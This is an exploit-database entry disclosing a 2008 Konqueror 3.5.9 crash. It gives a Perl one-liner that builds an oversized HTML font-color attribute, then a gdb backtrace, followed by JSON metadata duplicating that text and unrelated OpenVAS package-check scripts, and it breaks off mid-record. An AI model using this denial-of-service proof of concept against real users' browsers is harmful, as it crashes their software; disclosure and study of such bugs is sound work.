ID 1337DAY-ID-6631 Type zdt Reporter Jeremy Brown Modified 2008-10-06T00:00:00
Description
Exploit for linux platform in category dos / poc
=======================================================
Konqueror 3.5.9 (font color) Remote Crash Vulnerability
=======================================================
Konqueror isn't immune from fuzzing either
Konqueror, KDE's mighty mascot browser.. fuzzed.
perl -e 'print "<html>\n" . "<font color=" . "A" x 500000 . "\n</html>"' > kdie.html
#6 0xb7f8d410 in __kernel_vsyscall ()
#7 0xb7cf2085 in raise () from /lib/tls/i686/cmov/libc.so.6
#8 0xb7cf3a01 in abort () from /lib/tls/i686/cmov/libc.so.6
#9 0xb7ceb10e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6
#10 0xb6e94d10 in ?? () from /usr/lib/libX11.so.6
#11 0xb6e9518a in _XPutXCBBuffer () from /usr/lib/libX11.so.6
#12 0xb6e965df in _XSend () from /usr/lib/libX11.so.6
#13 0xb6e7c758 in XLookupColor () from /usr/lib/libX11.so.6
#14 0xb71a61d1 in QColor::setSystemNamedColor () from /usr/lib/libqt-mt.so.3
#15 0xb721c446 in QColor::setNamedColor () from /usr/lib/libqt-mt.so.3
#16 0xb60c5250 in ?? () from /usr/lib/libkhtml.so.4
#17 0xb60d143b in DOM::CSSParser::parseColorFromValue ()
from /usr/lib/libkhtml.so.4
#18 0xb60d216d in DOM::CSSParser::parseColor () from /usr/lib/libkhtml.so.4
#19 0xb60d3c9f in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4
#20 0xb60d7a09 in ?? () from /usr/lib/libkhtml.so.4
#21 0xb60d8134 in DOM::CSSParser::runParser () from /usr/lib/libkhtml.so.4
#22 0xb60d85a2 in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4
#23 0xb60d86e1 in ?? () from /usr/lib/libkhtml.so.4
#24 0xb601f0e9 in ?? () from /usr/lib/libkhtml.so.4
#25 0xb6021711 in ?? () from /usr/lib/libkhtml.so.4
#26 0xb6002b8a in ?? () from /usr/lib/libkhtml.so.4
#27 0xb602da00 in ?? () from /usr/lib/libkhtml.so.4
#28 0xb602dc96 in ?? () from /usr/lib/libkhtml.so.4
#29 0xb603b11f in ?? () from /usr/lib/libkhtml.so.4
#30 0xb603d5ae in ?? () from /usr/lib/libkhtml.so.4
#31 0xb5fb064e in KHTMLPart::write () from /usr/lib/libkhtml.so.4
#32 0xb5fa50c4 in KHTMLPart::slotData () from /usr/lib/libkhtml.so.4
#33 0xb5fd527f in KHTMLPart::qt_invoke () from /usr/lib/libkhtml.so.4
#34 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3
#35 0xb7ab2dcd in KIO::TransferJob::data () from /usr/lib/libkio.so.4
#36 0xb7ab2e38 in KIO::TransferJob::slotData () from /usr/lib/libkio.so.4
#37 0xb7afa659 in KIO::TransferJob::qt_invoke () from /usr/lib/libkio.so.4
#38 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3
#39 0xb7ab11ae in KIO::SlaveInterface::data () from /usr/lib/libkio.so.4
#40 0xb7af9e89 in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4
#41 0xb7b1be4a in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4
#42 0xb7ac2d7c in KIO::Slave::gotInput () from /usr/lib/libkio.so.4
#43 0xb7af1278 in KIO::Slave::qt_invoke () from /usr/lib/libkio.so.4
#44 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3
#45 0xb7278051 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3
#46 0xb7607b99 in QSocketNotifier::activated () from /usr/lib/libqt-mt.so.3
#47 0xb7299766 in QSocketNotifier::event () from /usr/lib/libqt-mt.so.3
#48 0xb720bc36 in QApplication::internalNotify () from /usr/lib/libqt-mt.so.3
#49 0xb720da5f in QApplication::notify () from /usr/lib/libqt-mt.so.3
#50 0xb7911672 in KApplication::notify () from /usr/lib/libkdecore.so.4
#51 0xb719c28d in QApplication::sendEvent () from /usr/lib/libqt-mt.so.3
#52 0xb71fdb4a in QEventLoop::activateSocketNotifiers ()
from /usr/lib/libqt-mt.so.3
#53 0xb71b1630 in QEventLoop::processEvents () from /usr/lib/libqt-mt.so.3
#54 0xb7226f90 in QEventLoop::enterLoop () from /usr/lib/libqt-mt.so.3
#55 0xb7226c8e in QEventLoop::exec () from /usr/lib/libqt-mt.so.3
#56 0xb720d7df in QApplication::exec () from /usr/lib/libqt-mt.so.3
#57 0xb666390a in kdemain () from /usr/lib/libkdeinit_konqueror.so
#58 0xb6748454 in kdeinitmain () from /usr/lib/kde3/konqueror.so
#59 0x0804ee20 in ?? ()
#60 0x0804f541 in ?? ()
#61 0x0804fa7b in ?? ()
#62 0x0805057d in ?? ()
#63 0xb7cdd450 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
#64 0x0804bb91 in ?? ()
Looks like it might have something to do with libx11...
konqueror: ../../src/xcb_lock.c:89: request_length: Assertion `vec[0].iov_len >= 4' failed.
Program received signal SIGABRT, Aborted.
[Switching to Thread 0xb660f6c0 (LWP 10553)]
0xb7eef410 in __kernel_vsyscall ()
(gdb) i r
eax 0x0 0
ecx 0x2939 10553
edx 0x6 6
ebx 0x2939 10553
esp 0xbf855efc 0xbf855efc
ebp 0xbf855f18 0xbf855f18
esi 0x2939 10553
edi 0xb7cd8ff4 -1211265036
eip 0xb7eef410 0xb7eef410 <__kernel_vsyscall+16>
eflags 0x206 [ PF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
Tested on Ubuntu 8.04 + Konqueror 3.5.9 , fully patched. Peace.
# 0day.today [2018-02-09] #
{"published": "2008-10-06T00:00:00", "id": "1337DAY-ID-6631", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:28:30", "bulletin": {"published": "2008-10-06T00:00:00", "id": "1337DAY-ID-6631", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.4, "modified": "2016-04-20T02:28:30"}}, "hash": "57579443b2450a01df126816b184a9b9f5ff0d99100da36431ccb572b3b3e2af", "description": "Exploit for linux platform in category dos / poc", "type": "zdt", "lastseen": "2016-04-20T02:28:30", "edition": 1, "title": "Konqueror 3.5.9 (font color) Remote Crash Vulnerability", "href": "http://0day.today/exploit/description/6631", "modified": "2008-10-06T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/6631", "references": [], "reporter": "Jeremy Brown", "sourceData": "=======================================================\r\nKonqueror 3.5.9 (font color) Remote Crash Vulnerability\r\n=======================================================\r\n\r\n\r\n\r\n\r\nKonqueror isn't immune from fuzzing either\r\nKonqueror, KDE's mighty mascot browser.. fuzzed.\r\n\r\nperl -e 'print \"<html>\\n\" . \"<font color=\" . \"A\" x 500000 . \"\\n</html>\"' > kdie.html\r\n\r\n#6 0xb7f8d410 in __kernel_vsyscall ()\r\n#7 0xb7cf2085 in raise () from /lib/tls/i686/cmov/libc.so.6\r\n#8 0xb7cf3a01 in abort () from /lib/tls/i686/cmov/libc.so.6\r\n#9 0xb7ceb10e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6\r\n#10 0xb6e94d10 in ?? () from /usr/lib/libX11.so.6\r\n#11 0xb6e9518a in _XPutXCBBuffer () from /usr/lib/libX11.so.6\r\n#12 0xb6e965df in _XSend () from /usr/lib/libX11.so.6\r\n#13 0xb6e7c758 in XLookupColor () from /usr/lib/libX11.so.6\r\n#14 0xb71a61d1 in QColor::setSystemNamedColor () from /usr/lib/libqt-mt.so.3\r\n#15 0xb721c446 in QColor::setNamedColor () from /usr/lib/libqt-mt.so.3\r\n#16 0xb60c5250 in ?? () from /usr/lib/libkhtml.so.4\r\n#17 0xb60d143b in DOM::CSSParser::parseColorFromValue ()\r\nfrom /usr/lib/libkhtml.so.4\r\n#18 0xb60d216d in DOM::CSSParser::parseColor () from /usr/lib/libkhtml.so.4\r\n#19 0xb60d3c9f in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4\r\n#20 0xb60d7a09 in ?? () from /usr/lib/libkhtml.so.4\r\n#21 0xb60d8134 in DOM::CSSParser::runParser () from /usr/lib/libkhtml.so.4\r\n#22 0xb60d85a2 in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4\r\n#23 0xb60d86e1 in ?? () from /usr/lib/libkhtml.so.4\r\n#24 0xb601f0e9 in ?? () from /usr/lib/libkhtml.so.4\r\n#25 0xb6021711 in ?? () from /usr/lib/libkhtml.so.4\r\n#26 0xb6002b8a in ?? () from /usr/lib/libkhtml.so.4\r\n#27 0xb602da00 in ?? () from /usr/lib/libkhtml.so.4\r\n#28 0xb602dc96 in ?? () from /usr/lib/libkhtml.so.4\r\n#29 0xb603b11f in ?? () from /usr/lib/libkhtml.so.4\r\n#30 0xb603d5ae in ?? () from /usr/lib/libkhtml.so.4\r\n#31 0xb5fb064e in KHTMLPart::write () from /usr/lib/libkhtml.so.4\r\n#32 0xb5fa50c4 in KHTMLPart::slotData () from /usr/lib/libkhtml.so.4\r\n#33 0xb5fd527f in KHTMLPart::qt_invoke () from /usr/lib/libkhtml.so.4\r\n#34 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3\r\n#35 0xb7ab2dcd in KIO::TransferJob::data () from /usr/lib/libkio.so.4\r\n#36 0xb7ab2e38 in KIO::TransferJob::slotData () from /usr/lib/libkio.so.4\r\n#37 0xb7afa659 in KIO::TransferJob::qt_invoke () from /usr/lib/libkio.so.4\r\n#38 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3\r\n#39 0xb7ab11ae in KIO::SlaveInterface::data () from /usr/lib/libkio.so.4\r\n#40 0xb7af9e89 in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4\r\n#41 0xb7b1be4a in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4\r\n#42 0xb7ac2d7c in KIO::Slave::gotInput () from /usr/lib/libkio.so.4\r\n#43 0xb7af1278 in KIO::Slave::qt_invoke () from /usr/lib/libkio.so.4\r\n#44 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3\r\n#45 0xb7278051 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3\r\n#46 0xb7607b99 in QSocketNotifier::activated () from /usr/lib/libqt-mt.so.3\r\n#47 0xb7299766 in QSocketNotifier::event () from /usr/lib/libqt-mt.so.3\r\n#48 0xb720bc36 in QApplication::internalNotify () from /usr/lib/libqt-mt.so.3\r\n#49 0xb720da5f in QApplication::notify () from /usr/lib/libqt-mt.so.3\r\n#50 0xb7911672 in KApplication::notify () from /usr/lib/libkdecore.so.4\r\n#51 0xb719c28d in QApplication::sendEvent () from /usr/lib/libqt-mt.so.3\r\n#52 0xb71fdb4a in QEventLoop::activateSocketNotifiers ()\r\nfrom /usr/lib/libqt-mt.so.3\r\n#53 0xb71b1630 in QEventLoop::processEvents () from /usr/lib/libqt-mt.so.3\r\n#54 0xb7226f90 in QEventLoop::enterLoop () from /usr/lib/libqt-mt.so.3\r\n#55 0xb7226c8e in QEventLoop::exec () from /usr/lib/libqt-mt.so.3\r\n#56 0xb720d7df in QApplication::exec () from /usr/lib/libqt-mt.so.3\r\n#57 0xb666390a in kdemain () from /usr/lib/libkdeinit_konqueror.so\r\n#58 0xb6748454 in kdeinitmain () from /usr/lib/kde3/konqueror.so\r\n#59 0x0804ee20 in ?? ()\r\n#60 0x0804f541 in ?? ()\r\n#61 0x0804fa7b in ?? ()\r\n#62 0x0805057d in ?? ()\r\n#63 0xb7cdd450 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6\r\n#64 0x0804bb91 in ?? ()\r\n\r\nLooks like it might have something to do with libx11...\r\n\r\nkonqueror: ../../src/xcb_lock.c:89: request_length: Assertion `vec[0].iov_len >= 4' failed.\r\n\r\nProgram received signal SIGABRT, Aborted.\r\n[Switching to Thread 0xb660f6c0 (LWP 10553)]\r\n0xb7eef410 in __kernel_vsyscall ()\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x2939 10553\r\nedx 0x6 6\r\nebx 0x2939 10553\r\nesp 0xbf855efc 0xbf855efc\r\nebp 0xbf855f18 0xbf855f18\r\nesi 0x2939 10553\r\nedi 0xb7cd8ff4 -1211265036\r\neip 0xb7eef410 0xb7eef410 <__kernel_vsyscall+16>\r\neflags 0x206 [ PF IF ]\r\ncs 0x73 115\r\nss 0x7b 123\r\nds 0x7b 123\r\nes 0x7b 123\r\nfs 0x0 0\r\ngs 0x33 51\r\n(gdb)\r\n\r\nTested on Ubuntu 8.04 + Konqueror 3.5.9 , fully patched. Peace. \r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "7fdfcffe259b686e1c9e96d1f6b1fa06", "key": "sourceHref"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "289f24141055fbe6d75811b81e4b3e2f", "key": "modified"}, {"hash": "418ebbb2d8fffb9525c33ff6d51869a2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "501d63429a959added37e1aeb968cc6f", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "9b9b8967be11c1ffd97c861fc22870e8", "key": "sourceData"}, {"hash": "99974a9d51fe7c1a0ed2fb0aef1c4f53", "key": "href"}, {"hash": "289f24141055fbe6d75811b81e4b3e2f", "key": "published"}, {"hash": "d3bccff9bfcc921c63ddc442be42efb0", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for linux platform in category dos / poc", "hash": "81789010f47ac055a046f374214161c8752375e2264d5dfd0298277e27b0b898", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-02-09T05:21:03"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310872183", "OPENVAS:1361412562310872185", "OPENVAS:1361412562310872149", "OPENVAS:1361412562310872153", "OPENVAS:1361412562310872151", "OPENVAS:1361412562310872150", "OPENVAS:1361412562310872147", "OPENVAS:1361412562310872137", "OPENVAS:1361412562310872131", "OPENVAS:1361412562310872110"]}], "modified": "2018-02-09T05:21:03"}, "vulnersScore": 0.2}, "type": "zdt", "lastseen": "2018-02-09T05:21:03", "edition": 2, "title": "Konqueror 3.5.9 (font color) Remote Crash Vulnerability", "href": "https://0day.today/exploit/description/6631", "modified": "2008-10-06T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "https://0day.today/exploit/6631", "references": [], "reporter": "Jeremy Brown", "sourceData": "=======================================================\r\nKonqueror 3.5.9 (font color) Remote Crash Vulnerability\r\n=======================================================\r\n\r\n\r\n\r\n\r\nKonqueror isn't immune from fuzzing either\r\nKonqueror, KDE's mighty mascot browser.. fuzzed.\r\n\r\nperl -e 'print \"<html>\\n\" . \"<font color=\" . \"A\" x 500000 . \"\\n</html>\"' > kdie.html\r\n\r\n#6 0xb7f8d410 in __kernel_vsyscall ()\r\n#7 0xb7cf2085 in raise () from /lib/tls/i686/cmov/libc.so.6\r\n#8 0xb7cf3a01 in abort () from /lib/tls/i686/cmov/libc.so.6\r\n#9 0xb7ceb10e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6\r\n#10 0xb6e94d10 in ?? () from /usr/lib/libX11.so.6\r\n#11 0xb6e9518a in _XPutXCBBuffer () from /usr/lib/libX11.so.6\r\n#12 0xb6e965df in _XSend () from /usr/lib/libX11.so.6\r\n#13 0xb6e7c758 in XLookupColor () from /usr/lib/libX11.so.6\r\n#14 0xb71a61d1 in QColor::setSystemNamedColor () from /usr/lib/libqt-mt.so.3\r\n#15 0xb721c446 in QColor::setNamedColor () from /usr/lib/libqt-mt.so.3\r\n#16 0xb60c5250 in ?? () from /usr/lib/libkhtml.so.4\r\n#17 0xb60d143b in DOM::CSSParser::parseColorFromValue ()\r\nfrom /usr/lib/libkhtml.so.4\r\n#18 0xb60d216d in DOM::CSSParser::parseColor () from /usr/lib/libkhtml.so.4\r\n#19 0xb60d3c9f in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4\r\n#20 0xb60d7a09 in ?? () from /usr/lib/libkhtml.so.4\r\n#21 0xb60d8134 in DOM::CSSParser::runParser () from /usr/lib/libkhtml.so.4\r\n#22 0xb60d85a2 in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4\r\n#23 0xb60d86e1 in ?? () from /usr/lib/libkhtml.so.4\r\n#24 0xb601f0e9 in ?? () from /usr/lib/libkhtml.so.4\r\n#25 0xb6021711 in ?? () from /usr/lib/libkhtml.so.4\r\n#26 0xb6002b8a in ?? () from /usr/lib/libkhtml.so.4\r\n#27 0xb602da00 in ?? () from /usr/lib/libkhtml.so.4\r\n#28 0xb602dc96 in ?? () from /usr/lib/libkhtml.so.4\r\n#29 0xb603b11f in ?? () from /usr/lib/libkhtml.so.4\r\n#30 0xb603d5ae in ?? () from /usr/lib/libkhtml.so.4\r\n#31 0xb5fb064e in KHTMLPart::write () from /usr/lib/libkhtml.so.4\r\n#32 0xb5fa50c4 in KHTMLPart::slotData () from /usr/lib/libkhtml.so.4\r\n#33 0xb5fd527f in KHTMLPart::qt_invoke () from /usr/lib/libkhtml.so.4\r\n#34 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3\r\n#35 0xb7ab2dcd in KIO::TransferJob::data () from /usr/lib/libkio.so.4\r\n#36 0xb7ab2e38 in KIO::TransferJob::slotData () from /usr/lib/libkio.so.4\r\n#37 0xb7afa659 in KIO::TransferJob::qt_invoke () from /usr/lib/libkio.so.4\r\n#38 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3\r\n#39 0xb7ab11ae in KIO::SlaveInterface::data () from /usr/lib/libkio.so.4\r\n#40 0xb7af9e89 in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4\r\n#41 0xb7b1be4a in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4\r\n#42 0xb7ac2d7c in KIO::Slave::gotInput () from /usr/lib/libkio.so.4\r\n#43 0xb7af1278 in KIO::Slave::qt_invoke () from /usr/lib/libkio.so.4\r\n#44 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3\r\n#45 0xb7278051 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3\r\n#46 0xb7607b99 in QSocketNotifier::activated () from /usr/lib/libqt-mt.so.3\r\n#47 0xb7299766 in QSocketNotifier::event () from /usr/lib/libqt-mt.so.3\r\n#48 0xb720bc36 in QApplication::internalNotify () from /usr/lib/libqt-mt.so.3\r\n#49 0xb720da5f in QApplication::notify () from /usr/lib/libqt-mt.so.3\r\n#50 0xb7911672 in KApplication::notify () from /usr/lib/libkdecore.so.4\r\n#51 0xb719c28d in QApplication::sendEvent () from /usr/lib/libqt-mt.so.3\r\n#52 0xb71fdb4a in QEventLoop::activateSocketNotifiers ()\r\nfrom /usr/lib/libqt-mt.so.3\r\n#53 0xb71b1630 in QEventLoop::processEvents () from /usr/lib/libqt-mt.so.3\r\n#54 0xb7226f90 in QEventLoop::enterLoop () from /usr/lib/libqt-mt.so.3\r\n#55 0xb7226c8e in QEventLoop::exec () from /usr/lib/libqt-mt.so.3\r\n#56 0xb720d7df in QApplication::exec () from /usr/lib/libqt-mt.so.3\r\n#57 0xb666390a in kdemain () from /usr/lib/libkdeinit_konqueror.so\r\n#58 0xb6748454 in kdeinitmain () from /usr/lib/kde3/konqueror.so\r\n#59 0x0804ee20 in ?? ()\r\n#60 0x0804f541 in ?? ()\r\n#61 0x0804fa7b in ?? ()\r\n#62 0x0805057d in ?? ()\r\n#63 0xb7cdd450 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6\r\n#64 0x0804bb91 in ?? ()\r\n\r\nLooks like it might have something to do with libx11...\r\n\r\nkonqueror: ../../src/xcb_lock.c:89: request_length: Assertion `vec[0].iov_len >= 4' failed.\r\n\r\nProgram received signal SIGABRT, Aborted.\r\n[Switching to Thread 0xb660f6c0 (LWP 10553)]\r\n0xb7eef410 in __kernel_vsyscall ()\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x2939 10553\r\nedx 0x6 6\r\nebx 0x2939 10553\r\nesp 0xbf855efc 0xbf855efc\r\nebp 0xbf855f18 0xbf855f18\r\nesi 0x2939 10553\r\nedi 0xb7cd8ff4 -1211265036\r\neip 0xb7eef410 0xb7eef410 <__kernel_vsyscall+16>\r\neflags 0x206 [ PF IF ]\r\ncs 0x73 115\r\nss 0x7b 123\r\nds 0x7b 123\r\nes 0x7b 123\r\nfs 0x0 0\r\ngs 0x33 51\r\n(gdb)\r\n\r\nTested on Ubuntu 8.04 + Konqueror 3.5.9 , fully patched. Peace. \r\n\r\n\r\n\n# 0day.today [2018-02-09] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d3bccff9bfcc921c63ddc442be42efb0", "key": "description"}, {"hash": "3ce638de80617000182d10990d3fad27", "key": "href"}, {"hash": "289f24141055fbe6d75811b81e4b3e2f", "key": "modified"}, {"hash": "289f24141055fbe6d75811b81e4b3e2f", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "501d63429a959added37e1aeb968cc6f", "key": "reporter"}, {"hash": "ddc1e6dd012c4d2b5ffdc2d5c1842abc", "key": "sourceData"}, {"hash": "e06cf3ee53bc56fba4e0388f35122992", "key": "sourceHref"}, {"hash": "418ebbb2d8fffb9525c33ff6d51869a2", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"openvas": [{"lastseen": "2019-06-18T14:43:46", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-06-18T00:00:00", "published": "2019-06-18T00:00:00", "id": "OPENVAS:1361412562310891821", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891821", "title": "Debian LTS Advisory ([SECURITY] [DLA 1821-1] phpmyadmin security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891821\");\n script_version(\"2019-06-18T02:00:39+0000\");\n script_cve_id(\"CVE-2016-6606\", \"CVE-2016-6607\", \"CVE-2016-6611\", \"CVE-2016-6612\", \"CVE-2016-6613\", \"CVE-2016-6624\", \"CVE-2016-6626\", \"CVE-2016-6627\", \"CVE-2016-6628\", \"CVE-2016-6630\", \"CVE-2016-6631\", \"CVE-2016-6632\", \"CVE-2016-9849\", \"CVE-2016-9850\", \"CVE-2016-9861\", \"CVE-2016-9864\", \"CVE-2019-12616\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-06-18 02:00:39 +0000 (Tue, 18 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-18 02:00:39 +0000 (Tue, 18 Jun 2019)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1821-1] phpmyadmin security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/06/msg00009.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1821-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/930017\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpmyadmin'\n package(s) announced via the DSA-1821-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple security vulnerabilities were fixed in phpmyadmin, a MySQL web\nadministration tool, which prevent possible SQL injection attacks, CSRF,\nthe bypass of user restrictions, information disclosure or\ndenial-of-service.\");\n\n script_tag(name:\"affected\", value:\"'phpmyadmin' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n4:4.2.12-2+deb8u6.\n\nWe recommend that you upgrade your phpmyadmin packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"phpmyadmin\", ver:\"4:4.2.12-2+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:35", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-26T00:00:00", "id": "OPENVAS:1361412562310872185", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872185", "title": "Fedora Update for httpd FEDORA-2016-8d9b62c784", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2016-8d9b62c784\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872185\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-26 06:03:52 +0100 (Mon, 26 Dec 2016)\");\n script_cve_id(\"CVE-2016-8743\", \"CVE-2016-2161\", \"CVE-2016-0736\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for httpd FEDORA-2016-8d9b62c784\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"httpd on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-8d9b62c784\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RHXWKK5E37QOYRHXJ3WS2Z23JZHGY3KW\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.25~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-26T00:00:00", "id": 